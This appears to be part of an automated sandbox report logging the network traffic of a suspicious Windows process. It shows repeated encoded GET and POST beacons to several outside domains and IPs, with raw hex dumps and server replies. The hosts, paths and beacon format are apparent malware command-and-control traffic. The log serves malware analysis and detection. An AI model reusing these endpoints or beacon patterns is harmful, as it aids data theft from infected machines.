                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.94973435.241.34.21680692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:43.710582972 CEST524OUTGET /7npk/?54D0m=gvohHHH0&mZytyNB=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MY4r+pCVils+sXQjgc19rp6lijR1H1Q== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.mg55aa.xyz
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:44.340939045 CEST300INHTTP/1.1 200 OK
                          Server: nginx/1.20.2
                          Date: Thu, 18 Jul 2024 06:18:44 GMT
                          Content-Type: text/html
                          Content-Length: 5161
                          Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                          Vary: Accept-Encoding
                          ETag: "65a4939c-1429"
                          Cache-Control: no-cache
                          Accept-Ranges: bytes
                          Via: 1.1 google
                          Connection: close
                          Jul 18, 2024 08:18:44.353832960 CEST1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                          Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                          Jul 18, 2024 08:18:44.353916883 CEST1236INData Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                          Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                          Jul 18, 2024 08:18:44.353924036 CEST1236INData Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                          Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                          Jul 18, 2024 08:18:44.354181051 CEST1236INData Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                          Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                          Jul 18, 2024 08:18:44.354187012 CEST217INData Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                          Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.94973574.208.46.17180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:49.409929991 CEST808OUTPOST /i1fz/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lavillitadepapa.com
                          Origin: http://www.lavillitadepapa.com
                          Referer: http://www.lavillitadepapa.com/i1fz/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 33 2f 57 62 31 4b 6d 6b 64 57 68 41 5a 49 52 32 74 4f 6b 6d 62 53 55 68 52 63 66 54 63 33 61 66 41 32 61 43 69 5a 58 4c 57 32 43 52 6b 49 32 6c 45 31 42 36 2f 53 62 2b 7a 41 41 52 53 50 37 67 54 74 66 38 4e 55 6e 69 67 4e 39 55 7a 7a 48 4d 6b 68 69 50 34 47 2f 62 70 37 62 32 6b 39 6a 75 4f 30 4c 69 46 33 47 44 53 30 48 77 4f 48 50 50 33 69 5a 31 46 66 33 7a 74 6f 57 4a 77 63 2f 70 70 61 37 30 4e 39 48 71 53 68 42 51 57 46 2f 48 43 30 53 55 47 4b 65 52 2b 52 64 6f 74 69 76 49 42 7a 55 63 6c 5a 67 6b 6f 33 6b 47 4e 37 46 64 46 75 79 45 76 75 6c 71 47 6d 69 4d
                          Data Ascii: mZytyNB=3/Wb1KmkdWhAZIR2tOkmbSUhRcfTc3afA2aCiZXLW2CRkI2lE1B6/Sb+zAARSP7gTtf8NUnigN9UzzHMkhiP4G/bp7b2k9juO0LiF3GDS0HwOHPP3iZ1Ff3ztoWJwc/ppa70N9HqShBQWF/HC0SUGKeR+RdotivIBzUclZgko3kGN7FdFuyEvulqGmiM
                          Jul 18, 2024 08:18:49.925992012 CEST466INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:49 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/
                          Content-Length: 245
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 69 31 66 7a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.94973674.208.46.17180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:51.948964119 CEST832OUTPOST /i1fz/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lavillitadepapa.com
                          Origin: http://www.lavillitadepapa.com
                          Referer: http://www.lavillitadepapa.com/i1fz/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 33 2f 57 62 31 4b 6d 6b 64 57 68 41 57 49 42 32 76 74 38 6d 54 53 55 6d 64 38 66 54 54 58 61 62 41 32 57 43 69 59 69 4d 57 6a 61 52 6b 6f 6d 6c 44 30 42 36 34 53 62 2b 39 67 41 59 66 76 37 70 54 74 54 46 4e 56 62 69 67 4e 70 55 7a 33 50 4d 6b 53 61 49 34 57 2b 39 6b 62 62 34 67 39 6a 75 4f 30 4c 69 46 32 69 6c 53 30 76 77 4f 58 54 50 32 44 5a 32 44 76 33 38 39 59 57 4a 36 38 2f 74 70 61 37 64 4e 38 62 41 53 6c 78 51 57 46 50 48 43 6c 53 4c 49 4b 65 62 77 78 64 38 38 41 75 66 42 42 55 6e 36 71 41 55 31 6c 38 39 4b 61 6c 44 55 63 37 66 36 35 6c 4e 42 42 72 6b 6f 4c 47 42 76 4c 72 77 67 52 73 39 44 78 72 59 45 66 44 6d 6d 77 3d 3d
                          Data Ascii: mZytyNB=3/Wb1KmkdWhAWIB2vt8mTSUmd8fTTXabA2WCiYiMWjaRkomlD0B64Sb+9gAYfv7pTtTFNVbigNpUz3PMkSaI4W+9kbb4g9juO0LiF2ilS0vwOXTP2DZ2Dv389YWJ68/tpa7dN8bASlxQWFPHClSLIKebwxd88AufBBUn6qAU1l89KalDUc7f65lNBBrkoLGBvLrwgRs9DxrYEfDmmw==
                          Jul 18, 2024 08:18:52.810693026 CEST466INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:52 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/
                          Content-Length: 245
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 69 31 66 7a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>
                          Jul 18, 2024 08:18:52.810739994 CEST466INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:52 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/
                          Content-Length: 245
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 69 31 66 7a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.94973774.208.46.17180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:54.496222019 CEST1845OUTPOST /i1fz/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lavillitadepapa.com
                          Origin: http://www.lavillitadepapa.com
                          Referer: http://www.lavillitadepapa.com/i1fz/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 33 2f 57 62 31 4b 6d 6b 64 57 68 41 57 49 42 32 76 74 38 6d 54 53 55 6d 64 38 66 54 54 58 61 62 41 32 57 43 69 59 69 4d 57 6a 53 52 6e 65 71 6c 46 58 70 36 35 53 62 2b 31 41 41 64 66 76 36 37 54 74 4c 42 4e 56 58 55 67 50 52 55 68 46 58 4d 7a 7a 61 49 68 6d 2b 39 34 72 62 35 6b 39 6a 33 4f 30 61 70 46 32 79 6c 53 30 76 77 4f 56 6e 50 69 69 5a 32 59 76 33 7a 74 6f 57 64 77 63 2f 56 70 61 6a 73 4e 38 50 36 52 57 35 51 57 6c 66 48 41 58 36 4c 41 4b 65 64 78 42 63 37 38 41 6a 59 42 42 49 42 36 72 31 50 31 6d 63 39 50 2b 6b 44 42 2f 62 41 67 4b 31 70 50 7a 72 38 69 62 44 68 71 62 75 57 2f 42 67 54 51 41 4f 72 42 39 4c 70 79 4d 66 35 6b 6d 55 42 48 4e 69 79 6f 42 4b 4a 72 4b 6d 4a 48 38 55 39 41 2f 61 37 66 33 33 70 34 50 66 37 55 38 37 56 6c 73 30 6b 37 35 6a 5a 72 67 46 70 45 44 2b 44 76 70 4b 32 30 48 31 74 48 50 57 67 4d 77 2b 51 73 70 2f 73 62 57 4f 62 71 32 4d 46 4b 66 34 57 51 57 4b 71 4c 44 2b 66 77 55 6f 33 7a 62 46 4d 6d 72 4c 34 7a 79 73 66 65 31 38 4a 73 72 4d 43 48 2f [TRUNCATED]
                          Data Ascii: mZytyNB=3/Wb1KmkdWhAWIB2vt8mTSUmd8fTTXabA2WCiYiMWjSRneqlFXp65Sb+1AAdfv67TtLBNVXUgPRUhFXMzzaIhm+94rb5k9j3O0apF2ylS0vwOVnPiiZ2Yv3ztoWdwc/VpajsN8P6RW5QWlfHAX6LAKedxBc78AjYBBIB6r1P1mc9P+kDB/bAgK1pPzr8ibDhqbuW/BgTQAOrB9LpyMf5kmUBHNiyoBKJrKmJH8U9A/a7f33p4Pf7U87Vls0k75jZrgFpED+DvpK20H1tHPWgMw+Qsp/sbWObq2MFKf4WQWKqLD+fwUo3zbFMmrL4zysfe18JsrMCH/pm8z4saJ9acN9r2eVufov8uotfcouvld3Qknsm4JjwIQ5wDCXfLEMDGvC2Cb+Pdf91Fprvz9p1vAIExn9muGHPlEHpf2ZdnuQgYce45Iv9Iu9QTy+9qIak2FsFPcrOcEmWRejqlmWiDu4sD/LY8hrZe+ipuqo7xnFTQoOqjOnADWjH7Ht93Yq7JM5hM/EupkGd2zO1rHGWQpEcdnCXe/ykRq9aWuNXtrMLhFe2231g3O+II/mVbXei15Yq4h6O5mEpRRKJXa5YmGZ6MZx+6mPspwvek6jZyTjkY3h/1qw19HPq/RCwbrFtFQHU487jlxqJRyFTOy4ViIQ2kc3ml0NHBT+1PVBU9CYYUizYn9hAT1qeIU7XZHHqSMLbxGc/pxjYWIoIcHOA0nApifTroao0mNSiCSqJNHXipgoG5oFkYOkusrS2SEPJgXXeI5edZnSB8RIepsLF8ulFquVoVuUOZjT87+Se41X+MzyPk2XwAsE6C1PqC2h+wRF8N2iCeqfyhTOUayTN1Cr0x8quQ/lz5n0Zedg2C6y+T1jgmakMWLLIE4tc5r3Abu+wfORkECfxuxjqzEpS7g94/yA/eIEda08GCgasc6EGx4L3XWvuiy31G7S8yZ6yIPXXPXWqtfH26R1IwKlmTHTbyFuMPpxa+mI2VJCGRYo2 [TRUNCATED]
                          Jul 18, 2024 08:18:55.043245077 CEST466INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:54 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/
                          Content-Length: 245
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 69 31 66 7a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.94973874.208.46.17180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:18:57.038337946 CEST533OUTGET /i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.lavillitadepapa.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:18:57.569361925 CEST750INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:18:57 GMT
                          Server: Apache
                          Location: https://www.lavillitadepapa.com/i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 69 31 66 7a 2f 3f 6d 5a 79 74 79 4e 42 3d 36 39 2b 37 32 2b 66 74 54 46 63 67 43 50 56 31 70 66 42 47 63 52 41 68 5a 4a 54 52 61 6b 4f 32 4b 68 2b 5a 6b 76 75 62 57 6e 53 4a 72 49 75 72 4b 6b 70 4e 6f 32 61 42 79 67 70 76 53 49 43 47 65 6f 50 6a 44 46 6e 39 70 65 6b 58 77 53 75 71 75 51 65 41 67 58 62 6e 6f 4e 58 47 71 59 6e 75 43 56 76 52 4e 45 36 5a 53 6e 43 76 5a 6c 4c 36 6a 77 3d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&amp;54D0m=gvohHHH0">here</a>.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.949739154.92.52.19680692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:19:02.667402983 CEST793OUTPOST /gtrt/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.csstoneoak.com
                          Origin: http://www.csstoneoak.com
                          Referer: http://www.csstoneoak.com/gtrt/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 50 46 38 55 46 43 44 6f 47 6b 45 71 2b 63 41 43 74 67 42 58 31 66 4c 4c 63 73 7a 74 4a 70 2f 35 72 70 79 35 47 31 73 6f 34 71 66 65 6f 31 6f 49 35 6e 57 2b 34 6c 70 36 65 51 4e 74 4e 66 67 41 78 6f 72 41 70 53 7a 49 66 67 76 4e 79 50 4d 4e 65 46 70 48 6e 61 53 56 45 4f 5a 67 44 4d 70 65 69 52 4a 6d 76 2b 55 4f 58 47 77 51 32 46 71 7a 30 6a 41 61 55 4e 37 2b 62 51 78 41 55 68 52 42 47 51 41 69 70 76 6e 70 44 49 65 6e 36 52 49 4e 2f 64 61 72 56 37 57 49 41 63 56 6b 6f 4c 76 6b 35 71 7a 66 4e 50 2b 72 68 7a 57 30 53 55 71 63 33 63 6f 74 47 6e 59 52 33 35 32 76
                          Data Ascii: mZytyNB=PF8UFCDoGkEq+cACtgBX1fLLcsztJp/5rpy5G1so4qfeo1oI5nW+4lp6eQNtNfgAxorApSzIfgvNyPMNeFpHnaSVEOZgDMpeiRJmv+UOXGwQ2Fqz0jAaUN7+bQxAUhRBGQAipvnpDIen6RIN/darV7WIAcVkoLvk5qzfNP+rhzW0SUqc3cotGnYR352v
                          Jul 18, 2024 08:19:03.581211090 CEST1236INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 06:19:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Content-Encoding: gzip
                          Data Raw: 64 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5a eb 53 1b c9 11 ff 1c ff 15 7b 4a a5 ea ae 72 42 12 60 0c 17 41 85 60 72 49 ce b1 7d 3e 2e ae 7c a2 84 b4 c0 da 7a 45 5a 8c b9 54 aa 24 b0 5e 20 24 61 64 de 20 9e 86 b3 41 12 6f 3d 10 fc 31 b7 33 bb fb e9 fe 85 f4 ec 4a 62 41 2b 19 47 c7 55 a5 ca 2e 17 b0 bb 33 3d 3d dd 3d fd f8 f5 18 07 59 9b 95 b2 30 ae 76 8d 95 75 69 28 ab c9 3e d0 ae f9 61 50 d3 71 e7 37 bf 31 da 68 d6 44 d9 4d 36 ba 5d f3 82 a1 87 9d 0e 17 ab a1 cc 0e 3b 4b db d9 76 cd 30 63 61 07 db 2d f4 0b c6 4c 6b a5 87 2f 29 c6 ce b0 8c c9 aa 75 9b 4d 56 ba dd d0 a0 ff 92 b2 c1 3b db 90 ed ca 2b d3 cb ab af 60 39 4a fe 67 64 fa 5d b0 20 65 33 b9 06 18 bb bc 84 be f8 34 48 33 03 83 6c bb 9e 92 5f 6b 0c 7a fd ef 34 54 f1 6d f1 c9 ed 32 b7 6b 06 59 d6 e9 fe 4a a7 1b 1e 1e 6e a0 59 1b 6b 68 6b 6e 30 3b 6c 3a b7 41 37 32 e4 7a 36 32 32 62 d2 50 d2 3a 7d 0e 97 85 86 cd db 1d 1a ca f8 99 16 98 74 39 ac 56 86 08 01 5e 69 b5 1d 1d 46 9d cc 51 99 43 ea 8e 11 46 31 4e 96 32 0f 9a 5c 6e 1a 24 f1 7d cf [TRUNCATED]
